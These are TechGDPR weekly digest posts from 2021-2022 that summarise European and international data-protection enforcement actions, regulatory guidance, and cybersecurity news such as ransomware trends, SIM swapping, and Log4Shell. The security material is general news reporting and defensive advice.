• a case where the GDPR implies that high risk can be assumed, such as the processing of special categories of data, processing regarding vulnerable people such as minors, situations where a data protection impact assessment, (DPIA), is required, or situations where a DPIA is required based on the criteria for processing operations that are likely to result in high risk (as laid down in the EDPB Guidelines).

The Italian privacy regulator ‘Garante’ gave a favorable decision on the processing of data by a hospital aimed at the study of patients suffering from neoplastic, infectious, degenerative, and traumatic pathologies of the thoracic region. The project envisages the creation of a database and research activity in nine areas that will be the subject of further specific protocols and submitted to the competent ethics committees for each area. To give the green light, however, the authority asked the researchers to base the collection – and the subsequent processing of health data for medical research purposes – on “progressive stages” consent. 

Garante previously authorized the collection and storage of data in the “Torax” database based on an initial consent expressed by patients at the time of participating in the study, provided that the hospital subsequently acquired specific consent from the patients. Garante decided for deceased or no longer contactable patients, and research projects were better defined and approved by the territorially competent ethics committees. The authority has favorably taken note of the technical measures implemented by the hospital to eliminate the risk of patient identification, deeming them suitable for ensuring the anonymization of the data processed. However, the company must periodically check these measures and possibly adjust.

Meanwhile, the Polish supervisory authority UODO imposed an administrative fine on the University Clinical Center of the Medical University of Warsaw. The decision was due to the failure to notify the UODO of a breach of personal data protection and the failure to notify the data subject. A patient received a referral from a doctor to a specialist clinic containing personal data about another person: their name, surname, address, identification number, information about the diagnosis and purpose of the advice. The administrator confirmed that there was a mistake in entering another patient’s personal data on the referral to a specialist clinic. Still, after analyzing it, he concluded that the referral used the personal data of a person who did not exist in reality. Although the controller qualified the incident as a security incident, it was not considered to have significant effects on the rights and obligations of the data subject. 

In the opinion of the UODO, there was a breach of personal data protection consisting of the disclosure of personal data to an unauthorized person, (another patient), as a result of an error by a doctor issuing a referral to a specialist clinic. The document issued by the doctor contained only one mistake in the patient’s favour. However, the rest of the data contained in the referral, eg, name, address, and identification number, did apply to the patient. Hence, it cannot be considered that the event concerned a non-existent person. Despite the mistake to this person’s advantage, they can be easily identified.

The Danish data protection authority criticized and issued two orders to EG Digital Welfare ApS. The IT system Mediconnect offered by EG, among other things, is used by municipalities, regions, and insurance companies to handle sensitive and confidential information about citizens. In this context, EG acts as a data processor for the Mediconnect IT system. It appears from the case that passwords are stored in the Mediconnect IT system in plain text, opening the possibility of access to special categories of data that are username and password-protected. The regulator issued an order to carry out irreversible encryption of passwords, and to ensure that the login solution is not done exclusively using a username and password (eg, multi-factor login, certificates, tokens, or a PKI solution).

Spain’s AEPD fined Vueling Airlines 30,000 euros for cookies violations. According to the complaint, when accessing Vueling’s website, users could not reject cookies or purchase tickets without accepting the sending of commercial communications and promotions. Vueling’s misuse of cookies on its website constituted a violation of Art. 22 of the country’s Information Society Services and Electronic Commerce legislation. The AEPD imposed on Vueling the above fine, which was subsequently reduced to 18,000 euros following Vueling’s admission of guilt and the voluntary payment of the fine.

Audits: an insurance company’s data processing

The UK ICO has audited Somerset Bridge Insurance Services Ltd data processing. The company agreed to it consensually. It was agreed that the audit would focus on direct marketing: the processes in place where an organisation undertakes marketing activities directed at customers on their database and/or obtained from third-party lists. This would include controls for management structures, policies, and procedures, monitoring and reporting, training, fairness and transparency, lawful consent, accuracy and integrity of records, operations, and data subjects’ rights. The summary of the audit was as follows:

• The company processes personal data from customers obtaining insurance quotes and policies. 
• It collects personal data directly from its customers through its website, aggregator sites, or telephone calls.
• It only relies on active opt-in consent for any form of marketing, including via email, phone, or SMS. 
• It currently does not use soft opt-in. Electronic marketing is mainly through a monthly newsletter. Each email to the customer includes the option to unsubscribe.
• It does not process special category data when processing data for marketing purposes. 
• Automated marketing calls are not made. 
• It does not buy in marketing lists from third parties. 

The ICO auditors reported a high level of assurance that the direct marketing activities conducted by the company were compliant with the UK GDPR, DPA 2018 and the Privacy and Electronic Communications Regulations. 

Data security: ransomware attacks

The EU cybersecurity agency ENISA stated that ransomware is one of the most devastating types of cybersecurity attack over the last decade and has grown to impact organisations of all sizes across the globe in the last year:

• About 10 terabytes of data were stolen each month by ransomware threat actors. 58.2% of the data stolen included employees’ data.
• At least 47 unique ransomware threat actors were found.
• For 94.2% of incidents, it is unknown if the company paid the ransom.
• When negotiation fails, the attackers usually publish the data on their web pages. This happens often and is a reality in 37,88% of incidents.
• The remaining 62,12% of companies either came to an agreement with the attackers or found another solution.

Several different ransomware business models emerged from the study: a) individual attackers; b) ransomware-as-a-service model; c) a data brokerage model; and d) a model aimed mostly at achieving notoriety. Thus the ENISA report recommends the following:

• keep an updated backup of your business files & personal data;
• keep this backup isolated from the network;
• apply the 3-2-1 rule of backup: 3 copies, 2 different storage media, 1 copy offsite;
• run security software designed to detect most ransomware in your endpoint devices;
• restrict administrative privileges, etc.

Big Tech: Paramount Global, US tech in Russia, TikTok in US, Manchester City’s smart scarf

Paramount Global, owner of CBS, is facing a class action lawsuit that alleges the Hollywood giant tracked and collected CBS.com subscriber data and sold it to Facebook without users’ consent. Paramount is accused of violating the Video Privacy Protection act, and Facebook has already recognised it uses CBS.com subscriber data, via the Facebook Tracking Pixel that Paramount uses.

Russia continues to tighten the regulatory screws on US tech firms, with fines imposed on Snapchat, WhatsApp, and Tinder for failing to store the data of their Russian users on local servers. Local data storage is a requirement since a 2019 law, although many western companies have fallen foul of it, and the number is growing.

China’s TikTok has paid a 92 million dollar settlement in a 2019 case brought in a Federal court in Illinois, alleging multiple data protection and privacy violations and illegal collection of biometric data. As part of the deal, TikTok must now restrict and disclose in its privacy policy what it collects and end the secret sending of data overseas.

Tech incorporated in clothes gives you useful feedback on a range of things. Now Manchester City have made their fans a scarf that gives the club loads of information about the wearer’s match experience. An EmotiBit sensor can read blood pressure, heart rate, emotional arousal or stress levels. The club has partnered for the pilot stage with Cisco, tech and production company Unit9, and sports marketers Octagon UK, although Man City is being coy for the moment about just what personal data will be collected and shared and with whom.

The post Weekly digest 25 July – 1 August 2022: UK publishes new data protection draft bill and updates BCRs appeared first on TechGDPR.

Grindr’s privacy fine in focus

Norway’s data protection authority has handed Grindr, the world’s largest social networking app for LGBTQ people, an over 6 mln euro privacy fine for disclosure of user data to third parties behavioural ads without a legal basis. The offenses were committed before April 2020, when its terms of use and consent management platform were updated. In 2020, the Norwegian Consumer Council filed a complaint against US-based Grindr, saying the app had illegally shared users’ GPS locations, IP addresses, ages, gender, and use of the app. Last week the regulator stated that Grindr shared such data through software development kits included in the Grindr app, often used to facilitate communication between the apps and the advertising vendors. At the same time, Grindr failed to comply with the most of the requirement for freely given, specific, informed and unambiguous consent and its withdrawal for such data sharing:

• users were forced to accept the privacy policy through the previous CMP in its entirety to use the app;
• the consents for sharing data with its advertising partners that Grindr collected were bundled with acceptance of the privacy policy as a whole (users were not asked specifically if they wanted to allow their data to be shared with third parties ads);
• the information about the sharing was not properly communicated to users;
• refusing consent was dependent on the user’s patience and technological understanding, and it did not demonstrate a fair, intuitive and genuine free choice.

Grindr argued that users who pressed “Cancel” when asked to accept the privacy policy, could upgrade to the paid version. However, the regulator  pointed out, at the time of registration the users were not given the choice to opt for the paid version of the app. The user would first have to go through the above described consent mechanism. It was only after this process that the user could decide to upgrade to the paid version. 

Grindr also argued that its advertising partners – in the event they would ever theoretically receive sensitive personal data – must “blind” themselves pursuant to Art. 25 of the GDPR, (Data protection by Design and by Default). Participants in the ad tech ecosystem would likely only receive a “blinded” app-ID and not the corresponding app name. However, in a different statement, Grindr also recognised that “all apps and all websites that serve advertising necessarily share the identity of the app and/or the website with their advertising partners. Simply put, it is highly unlikely any advertiser would purchase advertising on an unknown app or an unknown website.” 

The Norwegian regulator however stated that even if the app-ID in some instances was “blinded”, the recipient could still receive keywords relating to the Grindr app. As an example, OpenX, who Grindr consider to be its processor, appended keywords “gay”, “bi” and “bi-curious” in ad calls. This would have a similar effect to disclosing that the data subject is a Grindr user, and also constitute processing of personal data “concerning” an individual’s “sexual orientation” (Art. 9 of the GDPR). Read a 70-page fine notice of the Grindr case (available in English) with more facts and relevant GDPR provisions explained.

Data breaches, investigations and enforcement actions: ransomware attack, Clearview AI, children’s data

In Finland, a psychotherapy Center was issued a privacy fine over a failure to properly secure the processing of personal data and to report a security breach. The company notified the data protection commissioner in September 2020. The company found a blackmail message: the patient database has been uploaded to the attacker’s servers and a ransom was demanded to recover the lost data. A sample of the patient database was attached to the threat letter. Later it became clear that the hacking had probably already taken place in 2018, and another hack took place in 2019 due to the poor protection of the patient information system. The data protection impact assessment carried out by the respondent also did not meet the requirements of Art. 35 (7) of the GDPR. Finally, the company did not have a documented notification procedure in place at the time of the security breaches.

French regulator CNIL has ordered US-based Clearview AI, a facial recognition company that has collected billions of publicly-available images worldwide, to stop illegal use of biometric data from people in France and delete it within two months. The UK Information Commissioner’s Office, which worked with the Australians on the Clearview investigation, also said last month it intended to fine Clearview 17 mln pounds for alleged breaches of data protection law.

California-based online advertising platform OpenX Technologies will be required to pay 2 mln dollars to settle Federal Trade Commission allegations that the company collected personal information from children under 13 without parental consent, a direct violation of a federal children’s privacy protection law. The FTC also alleged that despite offering an opt-out option, OpenX collected geolocation information from users who specifically asked not to be tracked. The FTC’s investigation reviewed hundreds of child-directed apps with terms that identified the intended audience as “for toddlers,” “for kids,” “kids games,” or “preschool learning,” and included age ratings for the apps indicating they were directed to children under 13. However, these apps and their data were not flagged as child-directed and participated in the OpenX ad exchange, according to the FTC. 

Legal processes and redress: LED, DMA, DSA, US/AU Cloud Act 

The EDPB published its contribution to the EU Commission’s evaluation of the Data protection Law Enforcement Directive (LED). It is a piece of EU legislation, parallel to the GDPR, which also came into effect in 2018. LED aims at supporting the possibility of police authority co-operation through the exchange of personal data. Previously, EU legal instruments in this area have been limited to data protection rules for EU agencies, large scale IT systems established under EU law or cross-border exchanges of personal data in the context of police and judicial cooperation in criminal matters. However, new legislative and technological developments in the processing of data for law enforcement purposes have increased the workload of EDPB members. Also, data protection authorities may often have to balance their resources between supervision of the GDPR and the LED, noting: “more crucial than the number of available staff are the skills of the experts, who should cover a very broad range of issues – from criminal investigations and police cooperation to big data analytics and AI”.

The EU Parliament is ready to start negotiations with the Council on the Digital Markets Act (DMA). The text, now approved by MEPs, blacklists certain practices used by large platforms acting as “gatekeepers” and enables the Commission to carry out market investigations and sanction non-compliant behaviours. Core services will include not only social networks, search engines, operating systems, online advertising services, cloud computing, and video-sharing services, but also web browsers, virtual assistants and connected TV. The approved text also includes additional requirements on:

• the use of data for targeted or micro-targeted advertising and the interoperability of services, (eg, number-independent interpersonal communication services, social network services);
• gives users the option to uninstall pre-installed software applications, such as apps, on a core platform service at any stage. 

The text approved will be Parliament’s mandate for negotiations with EU governments, planned to start in the first semester of 2022. The Digital Services Act (DSA) – a parallel proposal to regulate online platforms dealing with, among other issues, profiling algorithms, deceiving or nudging techniques to influence users’ behaviour through “dark patterns” – is due to be put to the vote in plenary in January. Read also the latest analysis of the DSA’s possible effect for EU residents’ fundamental rights and freedoms by Baker McKenzie. 

Meanwhile, Australia and the US signed a Cloud Act deal to help law enforcement agencies demand data from tech giants, the Guardian reports. It will allow Australian and US law enforcement agencies to use existing warrants to demand information from overseas-based companies and communications service providers, reducing the time taken to obtain information. “It means companies including email providers, telcos, social media platforms, and cloud storage services could soon find themselves answering warrants from law enforcement agencies based in the US or Australia rather than their home jurisdiction”, the Guardian reports.

Official guidance: SMEs, developers, biometrics, cookies

The French regulator CNIL published a new version of its GDPR guide for developers (in French). The new content relates in particular to the use of cookies and other online tracers and on audience measurement solutions. It also draws up a non-exhaustive list of vulnerabilities that have led to data breaches notified to the CNIL, and presents examples of measures that would have made it possible to avoid them. In total, the guide now includes 18 thematic sheets that cover most of the developers’ needs to support them at each stage of their project from identifying and minimizing the personal data collected to preparing for the exercise of data subjects rights, managing the retention periods, and technical implementation of legal bases.

The CNIL is also continuing its action plan to ensure compliance by companies that use cookies. Since May 2021 the CNIL has sent out around 60 formal notices. Online checks have revealed that a number of organizations still do not allow online users to refuse cookies as easily as to accept them. The CNIL decided to send 30 new formal notices. The recent checks observe that:

• cookies, subject to consent, were automatically placed on the user’s terminal equipment before acceptance;
• information banners are still not compliant because they do not allow the user to refuse cookies as easily as accepting them;
• information banners can offer the user a means of refusing cookies with the same degree of simplicity as that provided for accepting them, but the proposed mechanism is not effective because cookies, subject to consent, are still placed after the refusal expressed by the user.

The following are particularly affected by these new formal notices: public establishments, higher education establishments, the clothing industry, transport sector, mass distribution sector, and distance selling sector.

In Germany, the Saxony-Anhalt data protection commissioner published its guide for small and medium-sized companies (in German only). Craftsmen, merchants and freelancers in various industries collect, store and use personal data from customers, employees or suppliers, often in a variety of ways – and must comply with data protection. The State Commissioner has received numerous inquiries from these companies for a long time. 

• What customer or employee data is a company allowed to collect? 
• How long may the data be stored? 
• What should be done when customers exercise their data protection rights or employee data has been encrypted by a cyber attack?

Answers to these and many other typical questions are provided by the State Commissioner in the newly published guide. Read the full text here.

The Belgian data protection authority published its final recommendation on the use of biometrics (in French and Dutch). Biometric data is qualified as a special category of personal data (Art. 9 GDPR). The recommendation includes a general prohibition to process such data, unless a specific ‘derogation’ is granted, either the explicit consent of the data subject, or the necessity for reasons of substantial public interest. Since there is currently no legal norm in Belgian law that authorizes the processing of biometric data for the authentication of individuals, and insofar as explicit consent cannot be invoked, such processing is currently performed without a legal basis. Other key takeaways are:  

• it is important to consider whether the performance of a contract or the provision of a service is conditioned on the consent being provided. 
• a presumption of consent not being “freely given”, exists in particular in employer-employee relationships and where a product or service has a (quasi-) monopoly in the market.
• Purpose limitation, data minimization and proportionality principles are particularly important for the processing of biometric data.
• Data protection impact assessments will generally be required. 
• No transition period for companies is provided. 

Opinion: What if your boss was an algorithm?

Privacy International with its partners have teamed up to challenge the unprecedented surveillance that gig economy workers are facing from their employers. They decided to file over 500 data subject access requests, (DSARs), to seven companies – Amazon Flex, Bolt, Deliveroo, Free Now, Just Eat, Ola, and Uber. They also interviewed gig-workers. According to their report, several gig economy employers seem reluctant to fully comply with their data protection obligations. The investigation was unable to obtain information about how algorithms calculate a score which is then used to prioritise dispatch of journeys to drivers. Some companies also failed to provide the guidance documents or location data that is gathered. Finally, the report demonstrates that surveillance is not just vast data collection, but also the use of more invasive technologies. The report provides specific examples where facial recognition technology ended up locking drivers out of their account due to potential identity verification failures.

Data security: Log4j follow up

The EU Commission, the EU Agency for Cybersecurity, CERT-EU and the network of the EU’s national computer security incident response teams have been closely following the development of the Log4Shell vulnerability since 10 December. It is a flaw in the well-known open source Java logging package Log4j, which is maintained by the Apache Software Foundation. Log4j is used in a wide array of applications and web services across the globe. Due to the nature of the vulnerability, its ubiquity and the complexity of patching in some of the impacted environments, it is important that all organisations, especially entities who fall under the Network and Information Security Directive, assess their potential exposure as soon as possible. The latest recommendations so far could be found in:

• list of vulnerable software, maintained by the Dutch National Cyber Security Center,
• advisory notices published by the CSIRTs Network Members in their relevant official communication channels,
• guidance given by CERT-EU.

Big Tech: E2EE, “buy-now, pay-later”, 5G smart factories, smartphones duopoly

Microsoft is rolling out end-to-end encryption, (E2EE), support for Microsoft Teams, the Verge reports. After announcing the feature earlier this year and testing a public preview since October, Teams is getting the E2EE security support for all one-to-one calls. Microsoft currently encrypts data in transit and at rest, allowing authorized services to decrypt content. Microsoft also uses SharePoint encryption to secure at-rest files and OneNote encryption for notes stored in Microsoft Teams. All chat content in Teams is also encrypted in transit and at rest.

US telecom giant Verizon signed a deal with Alphabet’s Google Cloud to use its 5G network and the tech firm’s computing power to offer services such as autonomous robots and smart factories, says Reuters. Telecom companies have been partnering with technology firms to automate businesses and factories to lower costs and speed up data traffic through private 5G networks that do not jostle for speed with others on a public network. Verizon has also been making private 5G deals in several countries and has partnered with other cloud operators such as Microsoft’s Azure and Amazon’s AWS. Reportedly “a camera attached to an autonomous mobile robot will scan packages to maintain inventory and using computer vision, the robot will send details over 5G to an inventory management system, providing real-time analytics”, the companies said.

The US Consumer Financial Protection Bureau, (CFPB), asked five “buy-now, pay-later” companies – Affirm, Afterpay, Klarna, PayPal and Zip Co – for information on their business practices, amid concerns that the financial products are putting consumers and their data at risk. The CFPB is concerned about “accumulating debt, regulatory arbitrage, and data harvesting” and is seeking data on the risks and benefits of the products. As an example, a recent survey by personal finance company Credit Karma found that one-third of US consumers who used “buy-now, pay-later” services have fallen behind on one or more payments, and 72% of those said their credit scores declined.

Apple and Google have a “vice-like grip” over people’s mobile phones and their duopoly over the market should be investigated by the proposed new regulator, the UK’s competition authority, the CMA. The two companies effectively control users’ mobile phone experience in the UK, with their operating systems installed on 99.45% of all phones in the country: “Once a consumer buys a phone they are essentially wedded to the ecosystem of one of the two companies – Apple’s App Store or Google’s Play Store and their respective web browsers Safari or Chrome”. The new Digital Markets Unit, (DMU), which will be part of the CMA, has been set up in shadow form until the government officially grants it regulatory powers. The DMU will enforce a code of conduct that the tech giants must follow when dealing with rivals and third parties. The code will affect only those companies deemed to have strategic market status, although no tech firms have been officially awarded that status yet, the Guardian reports.

The post Weekly digest December 13 – 19, 2021: Grindr’s privacy fine, guide for SMEs and developers, 5G smart factories appeared first on TechGDPR.

Legal processes and redress

The EU Whistleblowing Directive is due to be implemented into national law by 17 December. It requires all EU Member States to implement legislation obliging all companies with 50 or more workers to put in place appropriate reporting channels to enable those workers to report breaches of EU law and ensure that those making whistleblowing reports are legally protected against retaliation for having done so. Also, businesses with operations across the EU need to monitor implementation and understand local requirements by the data protection authorities, as there will be variations between jurisdictions, (see the implementation tracker country by country from Bird & Bird LLP). Key areas to address will be ensuring that: 

• reports are handled by the correct people, in accordance with prescribed timescales and with appropriate security and confidentiality;
• required information is given to the whistleblower and to the person investigated;
• there is guidance and training in place to ensure non-retaliation; and 
• there are appropriate retention periods for reports and investigation data. 

How could this be implemented in practice, (Germany example provided), involving work councils, internal codes of conducts, reporting options and controls, is provided in an article by Ius Laboris lawyers.

Uber, Deliveroo and a dozen other two-sided online platforms could be hit by draft EU rules for gig workers. They may have to reclassify some of their workers as employees under a new proposal from the EU Commission meant to boost their social rights. The rules apply to ride-hailing, food delivery apps etc, and require companies to provide information to employees on how their algorithms are used to monitor and evaluate them as well as  allocation of tasks and setting of fees. Employees can also demand compensation for breaches, Reuters reports. The rules place the burden on online platforms to provide evidence that these regulations do not apply to them. Workers can also challenge their reclassification either via an administrative process or in a court. The draft rules will need to be thrashed out with EU member states and EU lawmakers before they can be adopted, with the Commission estimating a 2025 time frame.

In Germany, the administrative court of Wiesbaden issued a preliminary decision prohibiting RheinMain University from using Cybot A/S’s consent management platform Cookiebot by Usercentrics, DataGuidance reports. In particular, the court found that:

• Cookiebot CMP transfers the complete IP address of the end user to the servers of a cloud company whose headquarters are in the US.
• The end user was identifiable from a combination of a key stored in the user’s browser, which identified the website visitor, and the transferred full IP address. 
• This constituted a transfer of personal data to a third country, underlining that this is prohibited in line with the “Schrems II” CJEU judgment. 

Even if the corresponding server is possibly located in the EU, the US group has access to it, so that the US Cloud Act with broad query options for US authorities takes effect. Finally, the university did not ask users’ consent for the data transfer, users were not informed about the possible risks associated with the transfer resulting from the US Cloud Act, and the data transfer was not necessary for the operation of the university’s website.

Official guidance

In Austria, a newly approved Code of Conduct, (available in German only), establishes more legal security for insurance brokers and consultants. In particular, the document, (approved by the data protection authority in accordance with Art.40 of the GDPR), finally clarifies the legal status of the insurance broker as the data controller, who acts independently in the interests of the customer and is not subject to any data protection instructions from an insurance company. In addition, there is now clarity about the justification for data processing with regard to “simple” and “special” categories of personal data. An advantage for all those who want to officially adhere to the Code of Conduct is an objective external monitoring body entrusted with checking compliance.

Data breaches, investigations and enforcement actions

The Dutch data protection authority, AP, imposed a fine of 2.75 mln euros on the tax authorities. For years the tax administration has processed the dual nationality of applicants for childcare allowance in an unlawful, discriminatory and improper manner. The dual nationality of Dutch nationals does not play a role in assessing an application for childcare allowance. Nevertheless, the tax administration kept and used this information. In addition, the tax authorities processed the nationality of applicants indicators to combat organised crime using a system that automatically designated certain applications as high-risk. The data was not necessary for those purposes, and the administration should have deleted the data according to GDPR data minimisation principles. In 2018 the tax administration stopped using these indicators, and by 2020 the dual nationalities of Dutch people were completely removed from its systems. 

The UK Information Commissioner’s Office, the ICO, hit broadband ISP and TV operator Virgin Media with a 50,000 pound fine after it sent nearly half a million direct marketing emails to people who had previously opted out. In August 2020 the regulator received a complaint from one of the operator’s customers about the unsolicited email. The message itself took the form of a price notification and attempted to get the customer to opt back into marketing communications. However just one customer complained to the ICO about receiving the spam – but that was enough to spur the regulator into investigating. Even though 6,500 customers decided to opt back into receiving marketing emails as a result of the mailshot, the ICO said this wasn’t enough to ignore UK regulation of Privacy and Electronic Communications. “The fact that Virgin Media had the potential for financial gain from its breach of the regulation, (by signing up more clients to direct marketing), is an aggravating factor”, the ICO stated.

The Norwegian data protection authority, Datatilsynet, has punished the Government Pension Fund, (SPK), with an infringement fee of 99,000 euros. The SPK has collected unnecessary income information about approx. 24,000 people. SPK had obtained income information from the tax administration since 2016. They themselves revealed that part of the information was data that should not have been collected, as it was not necessary for post-settlement disability benefits. The information was obtained through a predefined data set from the tax authority. Until 2019, SPK did not have routines for reviewing and deleting the surplus information that was collected, violating basic principles for data processing including special categories of personal information.

Artificial Intelligence

More and more companies will become engaged in developing and building AI systems but also in using already deployed AI systems. Therefore, potentially all companies will need to deal with the underlying legal issues to ensure accountability for AI systems sooner or later, says analysis by Bird and Bird LLP. One of these accountability requirements will often be the need to conduct a Data Protection Impact Assessment. DPIAs for AI systems deviate from similar assessments relating to the development and deployment of common software, which results from some peculiarities lying in the inherent nature of AI systems and how they work. The main points to consider are:

• Distinguishing between DPIAs for AI system development/enhancement (eg, training the algorithm) and for AI system deployment for productive use (eg, CVs of candidates are rejected based on the historical data fed into an algorithm).
• Taking a precise, technology-neutral approach to catching the essential characteristics of AI, (eg, systems with the goal of resembling intelligent behaviour by using methods of reasoning, learning, perception, prediction, planning or control).

The most important aspects of DPIAs for AI systems development/enhancement should include: controllership, purpose limitation, purpose alteration, necessity, statistical accuracy, data minimization, transparency, Individual rights, and data security risk assessment. Data controllers (providers of the AI system or the customers that deployed it) may also voluntarily decide to conduct DPIAs as an appropriate measure to strengthen their accountability, safeguarding the data subject’s rights. This may ultimately help to also win customer trust and maintain a competitive edge. 

Opinion

The Guardian publishes thoughts by a former co-leader of Google’s Ethical AI team Timnit Gebru:

“When people ask what regulations need to be in place to safeguard us from the unsafe uses of AI we’ve been seeing, I always start with labor protections and antitrust measures. I can tell that some people find that answer disappointing – perhaps because they expect me to mention regulations specific to the technology itself.” In her opinion, the incentive structure must be changed to prioritize citizens’ well-being. To achieve that, “an independent source of government funding to nourish independent AI research institutes is needed, that can be alternatives to the hugely concentrated power of a few large tech companies and the elite universities closely intertwined with them.”

Individual rights

Monitoring of workers’ personal data via entrance control systems – is featured by the Social Europe website. In tracking entrance to and exit from the workplace and ensuring its safety, electronic control systems, in which limited and non-sensitive data belonging to workers are uploaded, will be more in compliance with legal instruments than biometric systems. Biometric entrance-control systems should therefore be a last resort and limited to access to exceptional areas which require high security or in particular areas where highly confidential information is kept. As the article sums up, the EU’s GDPR does not directly regulate the monitoring of workers by electronic and biometric entrance-control systems. The provisions of such monitoring can be found in specific national legislation, but also in Council of Europe’s Recommendation CM/Rec (2015)5, on the processing of personal data in the context of employment, and Opinion 2/2017 of the Article 29 Working Party. 

Data security

How do Sim Swapping attacks work and what can you do to protect yourself? The European Union Agency for Cybersecurity, ENISA, has taken a technical deep dive into the subject. Since 2017 such attacks have usually targeted banking transactions, but not exclusively. They also hack the cryptocurrency community, social media and email accounts. In a SIM swapping attack, the attacker will convince the telecom provider to do the SIM swap, using social engineering techniques, pretending to be the real customer, claiming that the original SIM card is for example damaged or lost. Specific circumstances may open the opportunity for attackers, which can be:

• Weak customer authentication processes;
• Negligence or lack of cyber training or hygiene;
• Lack of risk awareness.

More information for the public is available in the ENISA Leaflet “How to Avoid SIM-Swapping”.

How long would it take a computer to hack your exact password? The latest chart by Statista website illustrates that a password of 8 standard letters contains 209 billion possible combinations, but a computer is able to calculate this instantly. Adding one upper case letter to a password dramatically alters a computer’s potential to crack a password, extending it to 22 minutes. Having a long mix of upper and lower case letters, symbols and numbers is the best way to make your password more secure. A 12-character password containing at least one upper case letter, one symbol and one number would take 34,000 years for a computer to crack.

Big Tech

Twitter is reviewing a controversial policy that penalizes users who share images of other users without their consent, The Guardian reports. The company has launched an internal review of the policy after making several errors in its enforcement. The platform now allows users to report other users who tweet “private media that is not available elsewhere online as a tool to harass, intimidate, and reveal the identities of individuals”. If a review concludes the complaint has merit and the image wasn’t used for a journalistic or public interest purpose, those accounts are deactivated. Some activists say the broad nature of the new rules makes them ineffective and ripe for abuse against the most vulnerable groups, while some reporters, photographers and journalists are concerned that they do not take into account unreasonable expectation of privacy in public spaces, and would undermine “the ability to report newsworthy events by creating nonexistent privacy rights”.

A Virginia federal court granted Microsoft’s request to seize 42 US-based websites run by a Chinese hacking group, IAPP reports. Microsoft, which has been tracking the hacker group known as Nickel since 2016, is redirecting the websites’ traffic to secure Microsoft servers to “protect existing and future victims.” Microsoft’s Corporate VP of Customer Security and Trust said Nickel targeted organizations in 29 countries, using collected data “for intelligence gathering from government agencies, think tanks, universities and human rights organizations.”

Several Amazon services – including its website, Prime Video and applications that use Amazon Web Services (AWS) – went down last week for thousands of users in the US and EU. Amazon’s Ring security cameras, mobile banking app Chime and robot vacuum cleaner maker iRobot were also facing difficulties. Amazon said the outage was probably due to problems related to application programming interface, which is a set of protocols for building and integrating application software. The huge trail of damage from a network problem came from a single region “US-EAST-1” and underscored how difficult it is for companies to spread their cloud computing around, Reuters reports. With 24% of the overall market, according to research firm IDC, Amazon is the world’s biggest cloud computing firm. Rivals like Microsoft, Alphabet’s Google and Oracle are trying to lure AWS customers to use parts of their clouds, often as a backup. 

Russia blocks popular privacy service Tor, ratcheting up internet control, Reuters reports. Russia has exerted increasing pressure on foreign tech companies this year over content shared on their platforms and has also targeted virtual private networks, (VPN), and other online tools. The Tor anonymity network is used to hide computer IP addresses to conceal the identity of an internet user. Tor also allows users to access the so-called “dark web”. Tor, which says its mission is to advance human rights and freedoms, has more than 300,000 users in Russia, or 14% of all daily users, second only to the US.

Recently uncovered software flaw could be “most critical vulnerability of the last decade”, the Guardian reports. The problem is in “Log4Shell”, which was uncovered in an open-source logging tool in Apache software ubiquitous in websites and web services. The flaw was reported to Apache by AliBaba on November 24th, and disclosed by Apache on December 9th. Reportedly it allows hackers password-free access to internal systems and databases. The open source logging tool is a standard kit for cloud servers, enterprise software, and across business and government. Few computer skills are needed to steal or obliterate data, or install malware by exploiting the bug. It will be days before the full extent of damage is known.

The post Weekly digest December 6 – 12, 2021: whistleblowers, gig-workers, cookiebots, software flows, DPIA for AI appeared first on TechGDPR.